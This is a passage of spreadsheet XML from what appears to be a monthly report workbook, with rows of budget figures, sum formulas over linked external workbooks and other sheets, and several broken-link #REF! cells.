      <c r="J50" s="194"/>
      <c r="K50" s="194">
        <f>J50+'r'!K50</f>
        <v>0</v>
      </c>
      <c r="L50" s="194" t="e">
        <f>K50+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="M50" s="194"/>
      <c r="N50" s="320"/>
      <c r="O50" s="208"/>
      <c r="P50" s="200"/>
      <c r="Q50" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R50" s="237">
        <v>2600</v>
      </c>
      <c r="S50" s="238" t="e">
        <f>[3]月报!$S$23+[3]月报!$S$20+[3]月报!$S$21+[3]月报!$S$22+[3]月报!$S$24</f>
        <v>#REF!</v>
      </c>
      <c r="T50" s="245" t="e">
        <f>[3]月报!$T$23+[3]月报!$T$20+[3]月报!$T$21+[3]月报!$T$22+[3]月报!$T$24</f>
        <v>#REF!</v>
      </c>
      <c r="U50" s="234"/>
      <c r="V50" s="234" t="e">
        <f>U50+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="W50" s="235" t="e">
        <f>[3]月报!$W$23+[3]月报!$W$20+[3]月报!$W$21+[3]月报!$W$22+[3]月报!$W$24</f>
        <v>#REF!</v>
      </c>
      <c r="X50" s="234"/>
      <c r="Y50" s="235" t="e">
        <f>X50+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="Z50" s="238" t="e">
        <f>[3]月报!$Z$23+[3]月报!$Z$20+[3]月报!$Z$21+[3]月报!$Z$22+[3]月报!$Z$24</f>
        <v>#REF!</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" spans="1:26">
      <c r="A51" s="191" t="s">
        <v>314</v>
      </c>
      <c r="B51" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C51" s="193"/>
      <c r="D51" s="193"/>
      <c r="E51" s="194">
        <v>68000</v>
      </c>
      <c r="F51" s="194"/>
      <c r="G51" s="225"/>
      <c r="H51" s="194">
        <f>G51+'r'!H51</f>
        <v>0</v>
      </c>
      <c r="I51" s="194">
        <f>H51+yc!I41</f>
        <v>124976</v>
      </c>
      <c r="J51" s="194"/>
      <c r="K51" s="194">
        <f>J51+'r'!K51</f>
        <v>0</v>
      </c>
      <c r="L51" s="194">
        <f>K51+yc!L41</f>
        <v>121393.54</v>
      </c>
      <c r="M51" s="194"/>
      <c r="N51" s="320">
        <f>M51/30000*100</f>
        <v>0</v>
      </c>
      <c r="O51" s="208"/>
      <c r="P51" s="200"/>
      <c r="Q51" s="193" t="s">
        <v>280</v>
      </c>
      <c r="R51" s="237"/>
      <c r="S51" s="238" t="e">
        <f>[3]月报!$S$12+[3]月报!$S$18</f>
        <v>#REF!</v>
      </c>
      <c r="T51" s="245" t="e">
        <f>[3]月报!$T$12+[3]月报!$T$18</f>
        <v>#REF!</v>
      </c>
      <c r="U51" s="234"/>
      <c r="V51" s="234" t="e">
        <f>U51+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="W51" s="235" t="e">
        <f>[3]月报!$W$12+[3]月报!$W$18</f>
        <v>#REF!</v>
      </c>
      <c r="X51" s="234"/>
      <c r="Y51" s="235" t="e">
        <f>X51+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="Z51" s="238" t="e">
        <f>[3]月报!$Z$12+[3]月报!$Z$18</f>
        <v>#REF!</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>62000</v>
      </c>
      <c r="F52" s="194"/>
      <c r="G52" s="225"/>
      <c r="H52" s="194">
        <f>G52+'r'!H52</f>
        <v>0</v>
      </c>
      <c r="I52" s="194">
        <f>H52+yc!I42</f>
        <v>0</v>
      </c>
      <c r="J52" s="194"/>
      <c r="K52" s="194">
        <f>J52+'r'!K52</f>
        <v>0</v>
      </c>
      <c r="L52" s="194">
        <f>K52+yc!L42</f>
        <v>0</v>
      </c>
      <c r="M52" s="194"/>
      <c r="N52" s="320">
        <f>M52/50000*100</f>
        <v>0</v>
      </c>
      <c r="O52" s="208"/>
      <c r="P52" s="200" t="s">
        <v>314</v>
      </c>
      <c r="Q52" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R52" s="237"/>
      <c r="S52" s="238">
        <f>[4]月报!$E$51</f>
        <v>5500.56999999998</v>
      </c>
      <c r="T52" s="238">
        <f>[4]月报!$F$51</f>
        <v>0</v>
      </c>
      <c r="U52" s="234"/>
      <c r="V52" s="234">
        <f>U52+yc!V44</f>
        <v>64753.168</v>
      </c>
      <c r="W52" s="235">
        <f>[4]月报!$I$51</f>
        <v>0</v>
      </c>
      <c r="X52" s="234"/>
      <c r="Y52" s="235">
        <f>X52+yc!Y44</f>
        <v>66410</v>
      </c>
      <c r="Z52" s="238">
        <f>[4]月报!$L$51</f>
        <v>5500.56999999998</v>
      </c>
    </row>
    <row r="53" ht="15.75" customHeight="1" spans="1:26">
      <c r="A53" s="191"/>
      <c r="B53" s="193"/>
      <c r="C53" s="193"/>
      <c r="D53" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E53" s="194"/>
      <c r="F53" s="194"/>
      <c r="G53" s="225"/>
      <c r="H53" s="194">
        <f>G53+'r'!H53</f>
        <v>0</v>
      </c>
      <c r="I53" s="194">
        <f>H53+yc!I43</f>
        <v>0</v>
      </c>
      <c r="J53" s="194"/>
      <c r="K53" s="194">
        <f>J53+'r'!K53</f>
        <v>0</v>
      </c>
      <c r="L53" s="194">
        <f>K53+yc!L43</f>
        <v>0</v>
      </c>
      <c r="M53" s="194"/>
      <c r="N53" s="320"/>
      <c r="O53" s="208"/>
      <c r="P53" s="200"/>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="237">
        <v>2000</v>
      </c>
      <c r="S53" s="238">
        <f>[4]月报!$F$53+[4]月报!$F$54+[4]月报!$F$55+[4]月报!$F$56</f>
        <v>0</v>
      </c>
      <c r="T53" s="238">
        <f>[4]月报!$F$53+[4]月报!$F$54+[4]月报!$F$55+[4]月报!$F$56</f>
        <v>0</v>
      </c>
      <c r="U53" s="234"/>
      <c r="V53" s="234">
        <f>U53+yc!V45</f>
        <v>1.329</v>
      </c>
      <c r="W53" s="235">
        <f>[4]月报!$I$53+[4]月报!$I$54+[4]月报!$I$55+[4]月报!$I$56</f>
        <v>0</v>
      </c>
      <c r="X53" s="234"/>
      <c r="Y53" s="235">
        <f>X53+yc!Y45</f>
        <v>1.329</v>
      </c>
      <c r="Z53" s="238">
        <f>[4]月报!$L$53+[4]月报!$L$54+[4]月报!$L$55+[4]月报!$L$56</f>
        <v>1796.626</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225"/>
      <c r="H54" s="194">
        <f>G54+'r'!H54</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I44</f>
        <v>128550.22</v>
      </c>
      <c r="J54" s="194"/>
      <c r="K54" s="194">
        <f>J54+'r'!K54</f>
        <v>0</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L44</f>
        <v>0</v>
      </c>
      <c r="M54" s="194"/>
      <c r="N54" s="320"/>
      <c r="O54" s="208"/>
      <c r="P54" s="200"/>
      <c r="Q54" s="193" t="s">
        <v>280</v>
      </c>
      <c r="R54" s="237"/>
      <c r="S54" s="238">
        <f>[4]月报!$E$47+[4]月报!$E$48</f>
        <v>840.85</v>
      </c>
      <c r="T54" s="238">
        <f>[4]月报!$F$47+[4]月报!$F$48</f>
        <v>0</v>
      </c>
      <c r="U54" s="234"/>
      <c r="V54" s="234">
        <f>U54+yc!V46</f>
        <v>0</v>
      </c>
      <c r="W54" s="235">
        <f>[4]月报!$I$47+[4]月报!$I$48</f>
        <v>0</v>
      </c>
      <c r="X54" s="234"/>
      <c r="Y54" s="235">
        <f>X54+yc!Y46</f>
        <v>0</v>
      </c>
      <c r="Z54" s="238">
        <f>[4]月报!$L$47+[4]月报!$L$48</f>
        <v>840.85</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225"/>
      <c r="H55" s="194">
        <f>G55+'r'!H55</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I45</f>
        <v>0</v>
      </c>
      <c r="J55" s="194"/>
      <c r="K55" s="194">
        <f>J55+'r'!K55</f>
        <v>0</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L45</f>
        <v>0</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="320"/>
      <c r="O55" s="208"/>
      <c r="P55" s="200" t="s">
        <v>315</v>
      </c>
      <c r="Q55" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R55" s="237">
        <v>9500</v>
      </c>
      <c r="S55" s="238">
        <f>[5]月报!$Y$7</f>
        <v>14957.063</v>
      </c>
      <c r="T55" s="238">
        <f>[5]月报!$Z$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="234"/>
      <c r="V55" s="234">
        <f>U55+yc!V47</f>
        <v>0</v>
      </c>
      <c r="W55" s="235">
        <f>[5]月报!$AC$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="234"/>
      <c r="Y55" s="235">
        <f>X55+yc!Y47</f>
        <v>0</v>
      </c>
      <c r="Z55" s="238">
        <f>[5]月报!$AF$7</f>
        <v>12301.632</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194">
        <f>E57+E60</f>
        <v>66000</v>
      </c>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'r'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I46</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'r'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L46</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="320"/>
      <c r="O56" s="208"/>
      <c r="P56" s="200"/>
      <c r="Q56" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R56" s="237">
        <v>9500</v>
      </c>
      <c r="S56" s="238">
        <f>[5]月报!$Y$6</f>
        <v>11614.811</v>
      </c>
      <c r="T56" s="238">
        <f>[5]月报!$Z$6</f>
        <v>0</v>
      </c>
      <c r="U56" s="234"/>
      <c r="V56" s="234">
        <f>U56+yc!V48</f>
        <v>6026.53</v>
      </c>
      <c r="W56" s="235">
        <f>[5]月报!$AC$6</f>
        <v>0</v>
      </c>
      <c r="X56" s="234"/>
      <c r="Y56" s="235">
        <f>X56+yc!Y48</f>
        <v>0</v>
      </c>
      <c r="Z56" s="238">
        <f>[5]月报!$AF$6</f>
        <v>9515.614</v>
      </c>
    </row>
    <row r="57" ht="15.75" customHeight="1" spans="1:26">
      <c r="A57" s="191"/>
      <c r="B57" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C57" s="193"/>
      <c r="D57" s="193"/>
      <c r="E57" s="194">
        <f>SUM(E58:E59)</f>
        <v>66000</v>
      </c>
      <c r="F57" s="194"/>
      <c r="G57" s="225"/>
      <c r="H57" s="194">
        <f>G57+'r'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I47</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'r'!K57</f>
        <v>0</v>
      </c>
      <c r="L57" s="194">
        <f>K57+yc!L47</f>
        <v>0</v>
      </c>
      <c r="M57" s="194"/>
      <c r="N57" s="320"/>
      <c r="O57" s="208" t="s">
        <v>282</v>
      </c>
      <c r="P57" s="200"/>
      <c r="Q57" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R57" s="237">
        <v>4500</v>
      </c>
      <c r="S57" s="238">
        <f>[5]月报!$Y$11+[5]月报!$Y$12+[5]月报!$Y$13+[5]月报!$Y$14</f>
        <v>2075.155</v>
      </c>
      <c r="T57" s="238">
        <f>[5]月报!$Z$11+[5]月报!$Z$12+[5]月报!$Z$13+[5]月报!$Z$14</f>
        <v>0</v>
      </c>
      <c r="U57" s="234"/>
      <c r="V57" s="234">
        <f>U57+yc!V49</f>
        <v>179888.95</v>
      </c>
      <c r="W57" s="235">
        <f>[5]月报!$AC$11+[5]月报!$AC$12+[5]月报!$AC$13+[5]月报!$AC$14</f>
        <v>0</v>
      </c>
      <c r="X57" s="234"/>
      <c r="Y57" s="235">
        <f>X57+yc!Y49</f>
        <v>176530.34</v>
      </c>
      <c r="Z57" s="238">
        <f>[5]月报!$AF$11+[5]月报!$AF$12+[5]月报!$AF$13+[5]月报!$AF$14</f>
        <v>3799.855</v>
      </c>
    </row>
    <row r="58" ht="15.75" customHeight="1" spans="1:26">
      <c r="A58" s="191"/>
      <c r="B58" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C58" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D58" s="193"/>
      <c r="E58" s="194">
        <v>38000</v>
      </c>
      <c r="F58" s="194"/>
      <c r="G58" s="225"/>
      <c r="H58" s="194">
        <f>G58+'r'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I48</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'r'!K58</f>
        <v>0</v>
      </c>
      <c r="L58" s="194">
        <f>K58+yc!L48</f>
        <v>0</v>
      </c>
      <c r="M58" s="194"/>
      <c r="N58" s="320"/>
      <c r="O58" s="208"/>
      <c r="P58" s="244"/>
      <c r="Q58" s="242" t="s">
        <v>280</v>
      </c>
      <c r="S58" s="330">
        <f>[5]月报!$Y$8</f>
        <v>5367.02</v>
      </c>
      <c r="T58" s="331">
        <f>[5]月报!$Z$8</f>
        <v>0</v>
      </c>
      <c r="U58" s="248"/>
      <c r="V58" s="234">
        <f>U58+yc!V50</f>
        <v>0</v>
      </c>
      <c r="W58" s="250">
        <f>[5]月报!$AC$8</f>
        <v>0</v>
      </c>
      <c r="X58" s="248"/>
      <c r="Y58" s="235">
        <f>X58+yc!Y50</f>
        <v>0</v>
      </c>
      <c r="Z58" s="331">
        <f>[5]月报!$AF$8</f>
        <v>5928.358</v>
      </c>
    </row>
    <row r="59" ht="15.75" customHeight="1" spans="1:26">
      <c r="A59" s="191"/>
      <c r="B59" s="191"/>
      <c r="C59" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D59" s="193"/>
      <c r="E59" s="194">
        <v>28000</v>
      </c>
      <c r="F59" s="194"/>
      <c r="G59" s="194"/>
      <c r="H59" s="194">
        <f>G59+'r'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I49</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'r'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L49</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="320"/>
      <c r="O59" s="208"/>
      <c r="P59" s="193" t="s">
        <v>320</v>
      </c>
      <c r="Q59" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R59" s="241"/>
      <c r="S59" s="235"/>
      <c r="T59" s="235"/>
      <c r="U59" s="235"/>
      <c r="V59" s="234" t="e">
        <f>U59+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="W59" s="235"/>
      <c r="X59" s="235"/>
      <c r="Y59" s="235" t="e">
        <f>X59+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="Z59" s="238">
        <v>887</v>
      </c>
    </row>
    <row r="60" ht="15.75" customHeight="1" spans="1:26">
      <c r="A60" s="191"/>
      <c r="B60" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C60" s="193"/>
      <c r="D60" s="193"/>
      <c r="E60" s="194"/>
      <c r="F60" s="194"/>
      <c r="G60" s="225"/>
      <c r="H60" s="194">
        <f>G60+'r'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I50</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'r'!K60</f>
        <v>0</v>
      </c>
      <c r="L60" s="194">
        <f>K60+yc!L50</f>
        <v>0</v>
      </c>
      <c r="M60" s="194"/>
      <c r="N60" s="320"/>
      <c r="O60" s="208"/>
      <c r="P60" s="191" t="s">
        <v>319</v>
      </c>
      <c r="Q60" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R60" s="245">
        <v>6200</v>
      </c>
      <c r="S60" s="237">
        <f>[6]月报!$M$15+[6]月报!$M$16+[6]月报!$M$17</f>
        <v>2774.41</v>
      </c>
      <c r="T60" s="237">
        <f>[6]月报!$N$15+[6]月报!$N$16+[6]月报!$N$17</f>
        <v>0</v>
      </c>
      <c r="U60" s="234"/>
      <c r="V60" s="234">
        <f>U60+yc!V51</f>
        <v>62998.471</v>
      </c>
      <c r="W60" s="241">
        <f>[6]月报!$Q$15+[6]月报!$Q$16+[6]月报!$Q$17</f>
        <v>0</v>
      </c>
      <c r="X60" s="234"/>
      <c r="Y60" s="235">
        <f>X60+yc!Y51</f>
        <v>60616.237</v>
      </c>
      <c r="Z60" s="332">
        <f>[6]月报!$T$15+[6]月报!$T$16+[6]月报!$T$17</f>
        <v>1979.763</v>
      </c>
    </row>
    <row r="61" ht="15.75" customHeight="1" spans="1:26">
      <c r="A61" s="191" t="s">
        <v>315</v>
      </c>
      <c r="B61" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C61" s="193"/>
      <c r="D61" s="193"/>
      <c r="E61" s="194">
        <v>97000</v>
      </c>
      <c r="F61" s="194"/>
      <c r="G61" s="225"/>
      <c r="H61" s="194">
        <f>G61+'r'!H61</f>
        <v>0</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I51</f>
        <v>1376399</v>
      </c>
      <c r="J61" s="194"/>
      <c r="K61" s="194">
        <f>J61+'r'!K61</f>
        <v>0</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L51</f>
        <v>1363123.931</v>
      </c>
      <c r="M61" s="194"/>
      <c r="N61" s="320">
        <f>M61/45000*100</f>
        <v>0</v>
      </c>
      <c r="O61" s="208"/>
      <c r="P61" s="242" t="s">
        <v>321</v>
      </c>
      <c r="Q61" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R61" s="333">
        <v>2500</v>
      </c>
      <c r="S61" s="237">
        <f>[7]月报!$D$43</f>
        <v>555.928999999999</v>
      </c>
      <c r="T61" s="237">
        <f>[7]月报!$E$43</f>
        <v>0</v>
      </c>
      <c r="U61" s="234"/>
      <c r="V61" s="234">
        <f>U61+yc!V52</f>
        <v>0</v>
      </c>
      <c r="W61" s="241">
        <f>[7]月报!$H$43</f>
        <v>0</v>
      </c>
      <c r="X61" s="234"/>
      <c r="Y61" s="235">
        <f>X61+yc!Y52</f>
        <v>0</v>
      </c>
      <c r="Z61" s="237">
        <f>[7]月报!$K$43</f>
        <v>384.908999999999</v>
      </c>
    </row>
    <row r="62" ht="15.75" customHeight="1" spans="1:26">
      <c r="A62" s="191"/>
      <c r="B62" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C62" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D62" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E62" s="194">
        <v>156000</v>
      </c>
      <c r="F62" s="194"/>
      <c r="G62" s="225"/>
      <c r="H62" s="194">
        <f>G62+'r'!H62</f>
        <v>0</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I52</f>
        <v>1383567.25</v>
      </c>
      <c r="J62" s="194"/>
      <c r="K62" s="194">
        <f>J62+'r'!K62</f>
        <v>0</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L52</f>
        <v>1281694.2</v>
      </c>
      <c r="M62" s="194"/>
      <c r="N62" s="320">
        <f>M62/80000*100</f>
        <v>0</v>
      </c>
      <c r="O62" s="208"/>
      <c r="P62" s="242" t="s">
        <v>312</v>
      </c>
      <c r="Q62" s="334"/>
      <c r="S62" s="172"/>
      <c r="T62" s="172"/>
      <c r="U62" s="172"/>
      <c r="V62" s="172"/>
      <c r="W62" s="172"/>
      <c r="X62" s="172"/>
      <c r="Y62" s="172"/>
      <c r="Z62" s="172"/>
    </row>
    <row r="63" ht="15.75" customHeight="1" spans="1:26">
      <c r="A63" s="191"/>
      <c r="B63" s="193"/>
      <c r="C63" s="193"/>
      <c r="D63" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E63" s="194"/>
      <c r="F63" s="194"/>
      <c r="G63" s="225"/>
      <c r="H63" s="194">
        <f>G63+'r'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I53</f>
        <v>0</v>
      </c>
      <c r="J63" s="194"/>
      <c r="K63" s="194">
        <f>J63+'r'!K63</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L53</f>
        <v>0</v>
      </c>
      <c r="M63" s="194"/>
      <c r="N63" s="320"/>
      <c r="O63" s="208"/>
      <c r="P63" s="335"/>
      <c r="Q63" s="336"/>
      <c r="R63" s="185"/>
      <c r="S63" s="185"/>
      <c r="T63" s="185"/>
      <c r="U63" s="185"/>
      <c r="V63" s="185"/>
      <c r="W63" s="185"/>
      <c r="X63" s="185"/>
      <c r="Y63" s="185"/>
      <c r="Z63" s="185"/>
    </row>
    <row r="64" ht="15.75" customHeight="1" spans="1:26">
      <c r="A64" s="191"/>
      <c r="B64" s="193"/>
      <c r="C64" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D64" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E64" s="194"/>
      <c r="F64" s="194"/>
      <c r="G64" s="225"/>
      <c r="H64" s="194">
        <f>G64+'r'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J64" s="194"/>
      <c r="K64" s="194">
        <f>J64+'r'!K64</f>
        <v>0</v>
      </c>
      <c r="L64" s="194">
        <f>K64+yc!L54</f>
        <v>211441.85</v>
      </c>
      <c r="M64" s="194"/>
      <c r="N64" s="320"/>
      <c r="O64" s="208"/>
      <c r="P64" s="193" t="s">
        <v>313</v>
      </c>
      <c r="Q64" s="337"/>
      <c r="R64" s="338"/>
      <c r="S64" s="338"/>
      <c r="T64" s="338"/>
      <c r="U64" s="338"/>
      <c r="V64" s="338"/>
      <c r="W64" s="338"/>
      <c r="X64" s="338"/>
      <c r="Y64" s="338"/>
      <c r="Z64" s="339"/>
    </row>
    <row r="65" ht="15.75" customHeight="1" spans="1:26">
      <c r="A65" s="191"/>
      <c r="B65" s="193"/>
      <c r="C65" s="193"/>
      <c r="D65" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E65" s="194"/>
      <c r="F65" s="194"/>
      <c r="G65" s="225"/>
      <c r="H65" s="194">
        <f>G65+'r'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J65" s="194"/>
      <c r="K65" s="194">
        <f>J65+'r'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L55</f>
        <v>35435.65</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="320"/>
      <c r="O65" s="208"/>
      <c r="P65" s="193"/>
      <c r="Q65" s="340"/>
      <c r="R65" s="341"/>
      <c r="S65" s="341"/>
      <c r="T65" s="341"/>
      <c r="U65" s="341"/>
      <c r="V65" s="341"/>
      <c r="W65" s="341"/>
      <c r="X65" s="341"/>
      <c r="Y65" s="341"/>
      <c r="Z65" s="342"/>
    </row>
    <row r="66" ht="15.75" customHeight="1" spans="1:26">
      <c r="A66" s="191"/>
      <c r="B66" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C66" s="193"/>
      <c r="D66" s="193"/>
      <c r="E66" s="194">
        <f>E67+E70</f>
        <v>85000</v>
      </c>
      <c r="F66" s="194"/>
      <c r="G66" s="194"/>
      <c r="H66" s="194">
        <f>G66+'r'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J66" s="194">
        <f>J67+J70</f>
        <v>0</v>
      </c>
      <c r="K66" s="194">
        <f>J66+'r'!K66</f>
        <v>0</v>
      </c>
      <c r="L66" s="194">
        <f>K66+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M66" s="194"/>
      <c r="N66" s="320"/>
      <c r="O66" s="208"/>
      <c r="P66" s="193"/>
      <c r="Q66" s="343"/>
      <c r="R66" s="344"/>
      <c r="S66" s="344"/>
      <c r="T66" s="344"/>
      <c r="U66" s="344"/>
      <c r="V66" s="344"/>
      <c r="W66" s="344"/>
      <c r="X66" s="344"/>
      <c r="Y66" s="344"/>
      <c r="Z66" s="345"/>
    </row>
    <row r="67" ht="15.75" customHeight="1" spans="1:26">
      <c r="A67" s="191"/>
      <c r="B67" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C67" s="193"/>
      <c r="D67" s="193"/>
      <c r="E67" s="194">
        <f>SUM(E68:E69)</f>
        <v>85000</v>
      </c>
      <c r="F67" s="194"/>
      <c r="G67" s="225"/>
      <c r="H67" s="194">
        <f>G67+'r'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J67" s="194">
        <f>SUM(J68:J69)</f>
        <v>0</v>
      </c>
      <c r="K67" s="194">
        <f>J67+'r'!K67</f>
        <v>0</v>
      </c>
      <c r="L67" s="194">
        <f>K67+yc!L57</f>
        <v>0</v>
      </c>
      <c r="M67" s="194"/>
      <c r="N67" s="320"/>
      <c r="O67" s="208"/>
      <c r="P67" s="193" t="s">
        <v>310</v>
      </c>
      <c r="Q67" s="337"/>
      <c r="R67" s="338"/>
      <c r="S67" s="338"/>
      <c r="T67" s="338"/>
      <c r="U67" s="338"/>
      <c r="V67" s="338"/>
      <c r="W67" s="338"/>
      <c r="X67" s="338"/>
      <c r="Y67" s="338"/>
      <c r="Z67" s="339"/>
    </row>
    <row r="68" ht="15.75" customHeight="1" spans="1:26">
      <c r="A68" s="191"/>
      <c r="B68" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C68" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D68" s="193"/>
      <c r="E68" s="194">
        <v>38000</v>
      </c>
      <c r="F68" s="194"/>
      <c r="G68" s="225"/>
      <c r="H68" s="194">
        <f>G68+'r'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J68" s="194"/>
      <c r="K68" s="194">
        <f>J68+'r'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L58</f>
        <v>0</v>
      </c>
      <c r="M68" s="194"/>
      <c r="N68" s="320"/>
      <c r="O68" s="208"/>
      <c r="P68" s="193"/>
      <c r="Q68" s="340"/>
      <c r="R68" s="341"/>
      <c r="S68" s="341"/>
      <c r="T68" s="341"/>
      <c r="U68" s="341"/>
      <c r="V68" s="341"/>
      <c r="W68" s="341"/>
      <c r="X68" s="341"/>
      <c r="Y68" s="341"/>
      <c r="Z68" s="342"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="191"/>
      <c r="C69" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D69" s="193"/>
      <c r="E69" s="194">
        <v>47000</v>
      </c>
      <c r="F69" s="194"/>
      <c r="G69" s="194"/>
      <c r="H69" s="194">
        <f>G69+'r'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J69" s="194"/>
      <c r="K69" s="194">
        <f>J69+'r'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M69" s="194"/>
      <c r="N69" s="320"/>
      <c r="O69" s="208"/>
      <c r="P69" s="193"/>
      <c r="Q69" s="343"/>
      <c r="R69" s="344"/>
      <c r="S69" s="344"/>
      <c r="T69" s="344"/>
      <c r="U69" s="344"/>
      <c r="V69" s="344"/>
      <c r="W69" s="344"/>
      <c r="X69" s="344"/>
      <c r="Y69" s="344"/>
      <c r="Z69" s="345"/>
    </row>
    <row r="70" ht="15.75" customHeight="1" spans="1:26">
      <c r="A70" s="191"/>
      <c r="B70" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C70" s="193"/>
      <c r="D70" s="193"/>
      <c r="E70" s="194"/>
      <c r="F70" s="194"/>
      <c r="G70" s="225"/>
      <c r="H70" s="194">
        <f>G70+'r'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
